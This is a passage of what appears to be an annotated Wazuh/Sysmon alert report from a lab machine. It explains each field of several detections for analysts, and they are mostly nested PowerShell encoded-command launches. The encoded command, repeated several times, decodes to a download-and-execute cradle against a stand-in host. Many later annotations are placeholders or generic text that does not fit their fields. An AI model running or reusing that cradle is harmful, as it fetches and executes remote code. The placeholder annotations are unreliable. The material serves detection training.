Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1084180
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the eventdata follows Sysmon's schema.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Provider GUID; constant for Sysmon. Only useful as a filter.

data.win.system.eventID:  11
Sysmon Event ID, not a Security‑log ID: 11 = FileCreate.

data.win.system.version:  2
Schema version of this event ID. Bumps when Sysmon adds fields.

data.win.system.level:  4
Numeric event level: 4 = Informational. Severity comes from the Wazuh rule, not from the event.

data.win.system.task:  11
Task category. For Sysmon the task number equals the Event ID (11 = FileCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:06.5107228Z
When the event was written to the channel, within 20 ms of utcTime here.

data.win.system.eventRecordID:  282532
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event (3712), not the subject process.

data.win.system.threadID:  4740
Thread ID inside the Sysmon service. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel (Sysmon/Operational).

data.win.system.computer:  Attacker
Computer name from the event itself; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:06.494 ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ProcessId: 11096 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4b14azk2.mml.ps1 CreationUtcTime: 2025-04-24 22:36:06.494 User: Attacker\Attcker1"
Sysmon's rendered FileCreate (EID 11) text. Again a __PSScriptPolicyTest_<random>.ps1 in the user's Temp – PowerShell's AppLocker/WDAC start‑up probe, so expected noise as a file. The creator's ProcessGuid is PID 11096, the third generation of the encoded‑command chain; each probe you see means another stage of that chain started.

data.win.eventdata.utcTime:  2025-04-24 22:36:06.494
Sysmon's UTC timestamp of the file creation, 1.1 s after PID 11096 started.

data.win.eventdata.processGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
GUID of the creating process – the processGuid of PID 11096 from the previous EID 1 alert.

data.win.eventdata.processId:  11096
PID of the creating process. Pivot on the GUID, not the PID.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file: PowerShell writing its own policy‑test file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4b14azk2.mml.ps1
Path of the created file. Same __PSScriptPolicyTest_xxxxxxxx.xxx.ps1 pattern in %TEMP%; the random 8.3 part changes per PowerShell start.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:06.494
File's creation timestamp; equals utcTime, so a fresh file, not an overwrite.

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file. Same local account as the process chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:59.081+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.081+0000
When the Wazuh manager generated the alert – not when the event was logged on the host (see data.win.system.systemTime, about 52 s earlier).

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1086949
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
Microsoft-Windows-Security-SPP is the Software Protection Platform (Windows licensing/activation) service. Despite the name it has nothing to do with security auditing.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
Provider GUID; constant for SPP. Filter value only.

data.win.system.eventSourceName:  Software Protection Platform Service
Legacy event source name used for Application‑log events; same service as providerName.

data.win.system.eventID:  16384
Application‑log Event ID 16384: SPP scheduled its own restart. Routine licensing housekeeping and one of the noisiest benign events on any Windows host.

data.win.system.version:  0
Event schema version; 0 for this classic Application‑log event.

data.win.system.level:  4
Numeric event level: 4 = Informational.

data.win.system.task:  0
Task category; 0 = none defined for this event.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:07.3943395Z
When the event was written to the Application log. Use this, not `timestamp`, to place it on the host timeline.

data.win.system.eventRecordID:  2403
Incremental log record number – handy for timeline order.

data.win.system.processID:  14228
PID of the process that logged the event – the SPP service, not anything in the PowerShell chain.

data.win.system.threadID:  0
Thread ID of the logging process; 0 for classic Application‑log events.

data.win.system.channel:  Application
Event log channel. Application, not Sysmon – this event did not come from endpoint telemetry.

data.win.system.computer:  Attacker
Computer name from the event itself; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine."
Plain text of the event: SPP will restart itself in 24 hours for a licensing rules check. Benign. The Medium label comes from the script's behaviour score, not from anything in this event; it landed in the same minute as the PowerShell chain by coincidence. Unless the restart time or reason looks odd, close it and stay on the Sysmon alerts.

data.win.eventdata.data:  2025-04-25T22:31:07Z, RulesEngine
Positional event parameters (restart time, reason) – the same values that appear in the message.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:59.633+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.633+0000
When the Wazuh manager generated the alert – not when the process started on the host (see data.win.system.systemTime, about 51 s earlier).

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1088531
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:08.7114133Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282582
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:07.440 ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ProcessId: 652 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ParentProcessId: 11096 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:07.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:59.652+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.652+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1096594
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:08.9070653Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282583
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:08.897 ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ProcessId: 652 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4zn2k3va.n12.ps1 CreationUtcTime: 2025-04-24 22:36:08.897 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:08.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4zn2k3va.n12.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:08.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.133+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.133+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1099355
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:11.0618882Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282615
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:09.916 ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ProcessId: 852 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ParentProcessId: 652 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:09.916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

